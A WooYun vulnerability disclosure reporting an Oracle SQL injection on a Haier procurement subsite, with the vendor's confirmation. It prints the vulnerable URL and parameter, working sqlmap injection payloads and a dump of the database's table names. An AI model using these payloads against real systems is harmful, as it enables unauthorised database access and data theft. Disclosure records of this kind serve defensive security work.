当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-089303

漏洞标题:海尔集团重要分站Oracle注入

相关厂商:海尔集团

漏洞作者: 淡蓝色の忧伤

提交时间:2014-12-30 16:59

修复时间:2015-02-13 17:00

公开时间:2015-02-13 17:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-30: 细节已通知厂商并且等待厂商处理中
2014-12-31: 厂商已经确认,细节仅向厂商公开
2015-01-10: 细节向核心白帽子及相关领域专家公开
2015-01-20: 细节向普通白帽子公开
2015-01-30: 细节向实习白帽子公开
2015-02-13: 细节向公众公开

简要描述:

海尔大宗原材料购销平台

详细说明:

首页.png


漏洞页面
http://dzll.haier.net:8888/providerUnlock.jsp
post 参数 "procode=1"
dba权限哦

注入.png


17数据库.png


sqlmap identified the following injection points with a total of 175 HTTP(s) req
uests:
---
Place: POST
Parameter: procode
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: procode=1' AND 3366=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113
)||CHR(113)||CHR(106)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (3366=3366) THEN 1
ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(106)||CHR(120)||CHR(113)||CHR(6
2))) FROM DUAL) AND 'Vbzc'='Vbzc
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: procode=1' AND 6134=DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(98)||CH
R(79)||CHR(81),5) AND 'xOtq'='xOtq
---
[10:25:53] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[10:25:53] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 98 times
[10:25:53] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\dzll.haier.net'

漏洞证明:

| BD_TASK_ZC                     |
| BD_VOUCHER |
| BD_VOUCHER_20130129 |
| BD_VOUCHER_20141204 |
| BD_VOUCHER_CANCEL |
| BD_VOUCHER_TEMP_0116 |
| BD_VOUCHER_TEST |
| BOM_CY |
| BOM_CY_SELECT |
| BOM_JC |
| BOM_JC_SELECT |
| BOM_JC_TEMP |
| BOM_MATERIAL |
| BOM_OUT |
| CD_AGENT_PRICE |
| CD_ALERT_TIME |
| CD_BOM |
| CD_BOM_COMMIT |
| CD_BOM_COMMIT_BAK |
| CD_BOM_TEMP |
| CD_CANCEL_CONDITION_1 |
| CD_CANCEL_CONDITION_2 |
| CD_CANCEL_CONDITION_3 |
| CD_CANCEL_CONDITION_4 |
| CD_CANCEL_PL |
| CD_CANCEL_PLANT |
| CD_CHAYI_KIND |
| CD_CHAYI_PL |
| CD_CIPC_SPEC_STOCKGROUP |
| CD_CODEFILE |
| CD_COMPONENT |
| CD_CURR_RATE |
| CD_CURR_TYPE |
| CD_CUSTOMER |
| CD_CUSTOMER_SPECIAL |
| CD_CUSTOMER_SPECIAL_R3 |
| CD_DEPT_PLANT |
| CD_EPG_CUSTOMERS |
| CD_FACTORY |
| CD_FACTORY_BAK |
| CD_FACTORY_EPG |
| CD_FACTORY_R |
| CD_FACTORY_R3 |
| CD_FUTURE_PRICE |
| CD_GVS_R3_COMPONY |
| CD_GVS_R3_COMPONY_DZLL |
| CD_GVS_R3_CUSTOMER |
| CD_GVS_R3_FACTORY |
| CD_HALF_BOM |
| CD_HALF_PURCHASE |
| CD_HALF_PURCHASE_BAK |
| CD_IDOC_TYPE |
| CD_MATERIAL |
| CD_MATERIAL_IMPORT |
| CD_MATERIAL_MART_PRICE |
| CD_MATERIAL_MODELS |
| CD_MATERIAL_PRICE |
| CD_MATERIAL_WASTE |
| CD_MATERIAL_WASTE_B |
| CD_NEW_LIMIT |
| CD_PLANT_COMPANY |
| CD_PURCHASE |
| CD_REASON |
| CD_RETURN_PROPORTION |
| CD_SAFE_STOCK |
| CD_SAP_IDOC_STATUS |
| CD_STEEL_KIND |
| CD_STEEL_KIND_PRINT |
| CD_STEEL_OVER |
| CD_STOCK_SENDER |
| CD_STOCK_SENDER_20100919 |
| CD_STOCK_SENDER_OUT |
| CD_STOCK_USER |
| CD_STOCK_USER_1 |
| CD_STOCK_USER_2 |
| CD_SUPPLIER |
| CD_SUPPLIER_BACKUP20071229 |
| CD_SUPPLIER_BUDGET |
| CD_SUPPLIER_BUDGET_BAK |
| CD_SUPPLIER_CANCEL |
| CD_SUPPLIER_GUARANT |
| CD_SUPPLIER_GUARANT_BAK |
| CD_SUPPLIER_PO_PLANT |
| CD_SUPPLIER_PR_LIMIT |
| CD_SUPPLIER_QUESTION |
| CD_SUPPLIER_R3 |
| CD_SYB |
| CD_TEMP |
| CHENCHEN_CHAJIA |
| CHENCHEN_FAHUO |
| CHENCHEN_SHOUHUO |
| CLOSE_NEW_LIST |
| CUIJUAN |
| EP_BULLEINT_AFFIX |
| EP_BULLETIN |
| EP_BULLETIN_CAT |
| EP_BULLETIN_CATMANAGE |
| HAIER_STOCK |
| HALF_COMPONENT_PO_DATA |
| HGVS_STOCK_CHANGE_RESULT |
| HX_DETAIL |
| HX_DETAIL_20071112 |
| HX_DETAIL_20071127 |
| HX_ERROR |
| HX_LOG |
| HX_LOG1 |
| HX_LOG_TEST |
| KK |
| LOGIN_LOG |
| LOGON_TABLE |
| MD_CONDITION |
| MD_MODULE |
| MD_PERSON_FRAME |
| MD_PERSON_HOMEPAGE |
| MD_PERSON_MODULE |
| MD_SYSTEM |
| MD_USER |
| MTEST |
| NAME |
| NEED_LOCK_ALERT |
| OA_CONFIG_TAB |
| OA_KEYS_TAB |
| OA_PUBINFO_GRP |
| ORG_DEPT |
| ORG_DUTY |
| ORG_EMPLOYEE |
| ORG_ENTRY |
| ORG_ENTRY2 |
| ORG_ENTRYINFO |
| ORG_ENTRY_20101130 |
| ORG_ENTRY_AWAY |
| ORG_ENTRY_CANCEL |
| ORG_PASSWORD_HISTORY |
| ORG_RIGHTLIST |
| ORG_UGRELATION |
| ORG_USERRIGHTLIST |
| PBCATCOL |
| PBCATEDT |
| PBCATFMT |
| PBCATTBL |
| PBCATVLD |
| PLAN_TABLE |
| PO_TASK_TEST |
| PO_TEST |
| PROBLEM_NEW_TASK_RIGTH |
| PR_TEST |
| QUEST_SL_TEMP_EXPLAIN1 |
| REQUEST_TEMP |
| RP_PRICE_CHANGE |
| SAP_BOM_DATA |
| SAP_BOM_DATA_TEMP |
| SAP_COMPONENT_PO_DATA |
| SAP_CUSTOMER_DATA |
| SAP_DELIVER_POST |
| SAP_DELIVER_POST_NEW |
| SAP_INFO_RECORD |
| SAP_INFO_RECORD_FALSE |
| SAP_LOG |
| SAP_MATERIAL_DATA |
| SAP_MONEY |
| SAP_MONEY070407 |
| SAP_MONEY_BAK |
| SAP_MONEY_TEMP_HGVS |
| SAP_MONEY_TEMP_HGVS_20080108 |
| SAP_MONEY_TEMP_HGVS_BAK |
| SAP_MONEY_TEMP_R3 |
| SAP_MONEY_TEMP_R3_20080108 |
| SAP_MONEY_TEMP_R3_BAK |
| SAP_ONWAY_PO |
| SAP_ONWAY_PO_BACKUP |
| SAP_PARA |
| SAP_PARA_R3 |
| SAP_PINGZHENG_DATA |
| SAP_PINGZHENG_DATA_20141204 |
| SAP_PINGZHENG_DATA_A |
| SAP_PINGZHENG_DATA_B |
| SAP_PINGZHENG_DATA_C |
| SAP_PINGZHENG_DATA_D |
| SAP_PINGZHENG_DATA_E |
| SAP_PINGZHENG_DATA_TEST |
| SAP_PLAN_DATA |
| SAP_PO_DATA |
| SAP_PR_INFO |
| SAP_RFC_STAT |
| SAP_STOCK_INFO |
| SAP_SUPPLY_DATA |
| SAP_SUPPLY_LINK |
| SI_BASE_INFO |
| SI_BUYERFORM_PLANT |
| SI_COMPONENT_PRICE |
| SI_COMP_CHANGED |
| SI_JGPRICE_DETAIL |
| SI_MARGIN |
| SPECIAL_MATERIAL_TEMP |
| SQL_PARA |
| STOCK |
| SUPPLY_STOCK |
| SUTEST |
| SU_DUIYING |
| SYS_SEQUENCE |
| SYS_SEQUENCE_1 |
| TASK_CANCEL_TEMP |
| TB_SYSTEM_JOB_INFO |
| TEMP_BD_TOCK_RECORD |
| TEMP_SUPPLIER_STOCK_20060304 |
| TEMP_ZHANGCHI_IMPORT |
| TEST |
| TEST_110506 |
| TEST_A |
| TEST_AAA |
| TEST_ABC |
| TEST_B |
| TEST_DETAIL |
| TMP_MATERIAL_MIN_PKG |
| TOAD_PLAN_TABLE |
| T_IDM_USER |
| T_PRC_DO_LOG |
| T_USER |
| T_USER_20100823 |
| T_USER_20101018 |
| UNLIMIT_TEMP |
| UP_CODE |
| USERCOMPARE |
| VOUCHER_JISUAN |
| VOUCHER_JISUAN_2 |
| VOUCHER_JISUAN_3 |
+--------------------------------+

修复方案:

你懂的。

版权声明:转载请注明来源 淡蓝色の忧伤@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-12-31 17:30

厂商回复:

谢乌云平台 淡蓝色の忧伤 的测试与提醒,我方已安排人员进行处理。

最新状态:

暂无